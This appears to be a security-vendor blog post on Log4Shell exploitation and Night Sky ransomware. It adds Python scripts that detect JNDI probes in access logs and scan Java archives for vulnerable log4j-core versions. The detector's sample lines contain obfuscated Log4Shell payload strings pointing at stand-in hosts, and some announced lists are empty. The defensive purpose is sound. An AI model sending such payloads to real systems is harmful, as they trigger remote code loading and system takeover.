When: In December 2021, the disclosure of Log4Shell alarmed security teams and called into question the safety of widely used open-source components.
What: Log4Shell is an unauthenticated remote code execution (RCE) vulnerability in Log4j2, a popular Java logging library used by millions of applications. The exploit allowed attackers to install cryptominers and to steal data and credentials.
Outcome: Once it became clear how easy Log4j2 was to exploit, threat actors moved quickly. Log4Shell triggered mass worldwide scanning, with payloads ranging from cryptominers and Unix DDoS malware to framework stagers pushed to compromised hosts. Conti became the first sophisticated ransomware group to actively exploit the vulnerability, and a new group of threat actors has since joined in.
Who: A group of unknown threat actors has been exploiting Log4Shell to deploy Night Sky ransomware. Three CVEs are associated with Log4Shell, and although patches are available, Night Sky remains a threat to environments still running unpatched versions of Log4j2. Let’s look at Night Sky ransomware and why patching Log4j2 has become a challenge.
As we previously mentioned, Log4Shell is a critical zero-day vulnerability in the Apache Log4j2 Java-based logging library. It is an unauthenticated remote code execution (RCE) vulnerability that allows complete system takeover on systems running Log4j 2.0-beta9 through 2.14.1 (CVE-2021-44228); the incomplete first fix in 2.15.0 was tracked as CVE-2021-45046 and fully addressed in 2.16.0. Log4Shell lets attackers install cryptominers as well as steal data and credentials.
The vulnerability was initially seen on sites hosting Minecraft servers, where attackers discovered it could be triggered simply by posting chat messages that the server logged. Exploitation was observed days before the vulnerability was publicly disclosed, and mass exploitation began the day after it was made public. Those early exploits originated from professional cryptomining and DDoS botnets such as Muhstik and Mirai. Microsoft additionally observed Log4Shell being used to deploy web shells and Cobalt Strike beacons, both of which function as backdoors.
Because almost every application and network security product relies on some kind of logging (and Log4j2 is one of the most widely used Java logging libraries), Log4Shell was, and still is, a serious concern for organizations running the software. Millions of applications use Log4j2, and an attacker who can get a vulnerable application to log a specially crafted string, for instance through a username, an HTTP header or a chat message, can compromise it. Three vulnerabilities ended up being associated with Log4Shell (CVE-2021-44228, CVE-2021-45046 and CVE-2021-4104, the last of which affects the JMSAppender in the older Log4j 1.2 line), and security analysts knew it was only a matter of time before threat actors found a way to exploit every single one.
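Defenders hunting for Log4Shell activity mostly see it in their own access logs, where the "special string of characters" shows up as a `${jndi:...}` lookup, often hidden behind URL encoding or nested `${lower:j}` / `${::-j}` lookups that Log4j2 resolves before the JNDI lookup fires. The following Python detector is an added example (not Avertium's tooling and not from the original post): it normalizes those obfuscations the way Log4j2 would and flags the probe, its source address and the JNDI scheme. The log lines are constructed samples using documentation-range IP addresses, not real traffic.

```python
import re
import urllib.parse

# Constructed sample web-server access-log lines (documentation-range IPs, not real
# traffic): a benign request, a plain JNDI probe in the User-Agent, an obfuscated
# probe using nested lookups, a URL-encoded probe in the query string, and a probe
# built entirely from ${::-x} default-value lookups.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:14:05:42 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [11/Dec/2021:02:13:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:l}dap://203.0.113.9/x}"',
    '203.0.113.9 - - [11/Dec/2021:02:14:11 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.9%2Fo%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.10 - - [11/Dec/2021:02:15:00 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.10/z}"',
]

# Innermost ${...} lookup: no nested "${" or "}" inside the braces.
INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A (possibly case-mangled) JNDI lookup and the URI scheme it points at.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)


def _resolve_lookup(match):
    """Evaluate one innermost lookup the way Log4j 2 would, for the three
    forms attackers used to hide the string 'jndi'; anything else is left intact."""
    body = match.group(1)
    if body.lower().startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.lower().startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # ${name:-default}: an undefined name (including an empty one, as in
        # ${::-j}) resolves to the default text.
        return body.split(":-", 1)[1]
    return match.group(0)


def normalize(text, max_rounds=10):
    """URL-decode and collapse nested lower/upper/default lookups until the
    string stops changing, so that obfuscated variants reduce to ${jndi:...}."""
    for _ in range(max_rounds):
        reduced = INNERMOST_LOOKUP.sub(_resolve_lookup, urllib.parse.unquote(text))
        if reduced == text:
            break
        text = reduced
    return text


def find_log4shell_probes(lines):
    """Return one finding per log line that carries a JNDI lookup after normalization."""
    findings = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize(line)
        match = JNDI_LOOKUP.search(normalized)
        if not match:
            continue
        end = normalized.find("}", match.start())
        payload = normalized[match.start(): end + 1 if end != -1 else len(normalized)]
        findings.append({
            "line": number,
            "source": line.split(" ", 1)[0],   # client address is the first field
            "scheme": match.group(1).lower(),
            "payload": payload,
        })
    return findings


if __name__ == "__main__":
    for finding in find_log4shell_probes(SAMPLE_LOG_LINES):
        print(f"line {finding['line']}: {finding['source']} -> "
              f"{finding['scheme']} {finding['payload']}")
```

Running the script over the sample lines reports lines 2 through 5 and misses the benign first line. The normalization step is what matters in practice: a regex for the literal `${jndi:` alone would have missed three of the four probes, and the same `${lower:...}` and `${::-...}` tricks appeared in the mass scanning described above.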
By January 2022, threat actors began to take advantage of the vulnerabilities in Log4j2. The vulnerabilities are:
Although patches are available, many systems remain unpatched, and the actors behind Night Sky have been exploiting unpatched VMware Horizon deployments. These exploits follow VMware’s security advisory warning that CVE-2021-44228 and CVE-2021-45046 affect on-premises VMware Horizon and the VMware Horizon Agent.
Night Sky, first reported by the security research group MalwareHunterTeam, is a new ransomware family that targets corporate networks. The threat actors behind it practice double extortion: they demand payment for a decryptor as well as for not releasing stolen data.
The Night Sky operation started on December 27, 2021, and has already published data from two victims on its Tor leak site. According to MalwareHunterTeam, the victims are in Bangladesh and Japan. Night Sky demanded $800,000 from one victim in exchange for a decryptor and the non-release of the stolen data.
Threat intelligence researchers at Microsoft assess that the threat actors behind Night Sky (tracked as DEV-0401) are based in China. The group previously deployed several other ransomware families (LockFile, AtomSilo and Rook) and exploited other internet-facing systems, including Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).
Image 1: Tweet from Microsoft
The United Kingdom’s National Health Service issued an alert warning that attackers were compromising VMware Horizon servers to establish persistence on NHS systems. Those attacks were not attributed to Night Sky specifically, but the same Log4j flaw was used.
Source: Twitter
According to Microsoft, the China-based threat actors use command-and-control (C2) servers that spoof legitimate domains. These domains include:
Analysts suspect that the threat actors behind Night Sky infiltrate corporate networks using tried-and-tested methods such as social engineering or stolen credentials. It is also suspected that, before Night Sky is launched, a human operator carries out reconnaissance, expands access, and exfiltrates files from endpoints across the network.
Once launched, the ransomware encrypts most files on the affected computer, skipping files with the .dll and .exe extensions. Night Sky also skips the following files and folders:
$Recycle.Bin, All Users, AppData, autorun.inf, Boot, boot.ini, bootfont.bin, bootmgfw.efi, bootmgr, bootmgr.efi,
bootsect.bak, desktop.ini, iconcache.db, Internet Explorer, Mozilla, Mozilla Firefox, ntldr, ntuser.dat, ntuser.dat.log,
ntuser.ini, Opera, Opera Software, Program Files, Program Files (x86), ProgramData, thumbs.db, Tor Browser, Windows, Windows.old
Image 2: Night Sky Extension
Files encrypted by Night Sky are renamed with the .nightsky extension.
Source: blog.malwarebytes.com
Image 3: Night Sky Ransom Note
Night Sky also drops a ransom note named NightSkyReadMe.hta in every folder containing encrypted files.
Source: blog.malwarebytes.com
Image 4: Chat with Night Sky’s Threat Actors
The ransom note lists what Night Sky stole, provides email contacts, and includes hardcoded credentials for the victim’s negotiation page. The victim uses those credentials to log in to a Rocket.Chat instance and communicate with the threat actors directly.
Source: blog.malwarebytes.com
Log4Shell remains an issue because vendors are still identifying and patching vulnerable software and systems, and those vendors’ customers then have to test the updates and roll them out into their own environments. Vulnerabilities in open-source components affect not only the applications that use the vulnerable library but every service built on those applications, so customers may not immediately realize how widespread the issue is within their environment.
"Customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments. Due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, requiring ongoing, sustainable vigilance." – Microsoft
Although Night Sky is still relatively new, it is a good example of how Log4Shell exploitation continues to escalate. With so many moving parts, everyone affected by Log4Shell needs to do their due diligence and patch their systems. Leaving systems unpatched risks threat actors like those behind Night Sky breaking in, stealing credentials, exfiltrating data and infecting networks with malware. And the last thing an organization needs is to be forced into paying a ransom for its own data.
According to CISA, the attacks targeting Log4j2 have so far been largely low-level, aimed primarily at building botnets or cryptomining. However, CISA Director Jen Easterly warned that advanced threat actors have probably already exploited Log4Shell to gain persistence and will lie low on compromised systems until defenders are less alert.
When the news about Log4j2 broke, Avertium began hunting for evidence of vulnerable or exploited Log4j2 instances in customer environments, and we continue to hunt for both Log4j2 exploitation and Night Sky ransomware. Take a look at how we handled Log4j2 in our customer environments and the services we continue to offer for vulnerabilities pertaining to the Log4Shell exploit:
All organizations should scan for applications that bundle vulnerable versions of Log4j2 and update them to the latest release.
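The hard part of that scan is that Log4j2 rarely sits on disk as a bare file: it is bundled inside application JARs, WARs and EARs, sometimes nested several levels deep, and the file name on its own is not a reliable indicator. The Python check below is an added example, not Avertium's tooling or any scanner mentioned in the original. It walks an archive (recursing into nested jars), reads the version from the bundled Maven pom.properties, and reports whether the artifact is below the first release on its branch that fixes CVE-2021-44228 and CVE-2021-45046, or has had JndiLookup.class removed as the documented stop-gap. The fixture jars are constructed in memory so the example runs offline; scan_directory shows the same logic applied to a real filesystem tree.

```python
import io
import re
import zipfile
from pathlib import Path

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")

# First log4j-core release on each maintained branch that fixes both
# CVE-2021-44228 and CVE-2021-45046; everything below it needs an upgrade.
FIXED_BY_BRANCH = {(2, 3): (2, 3, 1), (2, 12): (2, 12, 2)}
FIXED_DEFAULT = (2, 16, 0)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); None if no version is present."""
    match = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    return tuple(int(part or 0) for part in match.groups()) if match else None


def status_for(version, has_jndi_lookup):
    """Classify a log4j-core artifact from its version and whether JndiLookup.class is still inside."""
    if version is None:
        return "unknown version" + (", JndiLookup.class present" if has_jndi_lookup else "")
    if version[0] != 2:
        return "not log4j 2.x"
    if version >= FIXED_BY_BRANCH.get(version[:2], FIXED_DEFAULT):
        return "patched"
    # Deleting JndiLookup.class from the jar was Apache's documented stop-gap
    # for deployments that could not upgrade immediately.
    return "vulnerable" if has_jndi_lookup else "mitigated (JndiLookup.class removed)"


def scan_archive(data, name, findings=None):
    """Inspect an archive given as bytes, recursing into nested jar/war/ear/zip entries."""
    findings = [] if findings is None else findings
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with archive:
        entries = set(archive.namelist())
        basename = Path(name).name
        version = None
        if POM_PROPERTIES in entries:
            props = archive.read(POM_PROPERTIES).decode("utf-8", "replace")
            match = re.search(r"^version=(.+)$", props, re.MULTILINE)
            version = parse_version(match.group(1)) if match else None
        if version is None and "log4j-core" in basename:
            version = parse_version(basename)   # fall back to the file name
        has_jndi = JNDI_LOOKUP_CLASS in entries
        if version is not None or has_jndi:
            findings.append({"path": name, "version": version,
                             "status": status_for(version, has_jndi)})
        for entry in sorted(entries):
            if entry.lower().endswith(ARCHIVE_SUFFIXES):
                scan_archive(archive.read(entry), f"{name}!/{entry}", findings)
    return findings


def scan_directory(root):
    """Walk a filesystem tree and scan every jar/war/ear/zip found."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            scan_archive(path.read_bytes(), str(path), findings)
    return findings


def build_fixture_archive(entries):
    """Constructed test fixture: an in-memory zip built from name -> content entries."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        for entry_name, content in entries.items():
            archive.writestr(entry_name, content)
    return buffer.getvalue()


def build_fixture_log4j_core(version, include_jndi_lookup=True):
    """Constructed stand-in for a log4j-core jar (not a real Log4j build)."""
    entries = {POM_PROPERTIES: f"version={version}\nartifactId=log4j-core\n"}
    if include_jndi_lookup:
        entries[JNDI_LOOKUP_CLASS] = b"\xca\xfe\xba\xbe"   # placeholder class bytes
    return build_fixture_archive(entries)


if __name__ == "__main__":
    war = build_fixture_archive({
        "WEB-INF/classes/App.class": b"",
        "WEB-INF/lib/log4j-core-2.12.1.jar": build_fixture_log4j_core("2.12.1"),
    })
    for finding in scan_archive(war, "app.war"):
        print(finding)
```

The branch table is the detail most ad-hoc scripts get wrong: 2.12.2 and 2.3.1 are patched even though they sort below 2.16.0, while 2.15.0 is not. Reporting "mitigated" separately from "patched" keeps hosts that only had the class deleted on the remediation list, since they still need the real upgrade.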
COPYRIGHT: Copyright © Avertium, LLC and/or Avertium Tennessee, Inc. | All rights reserved.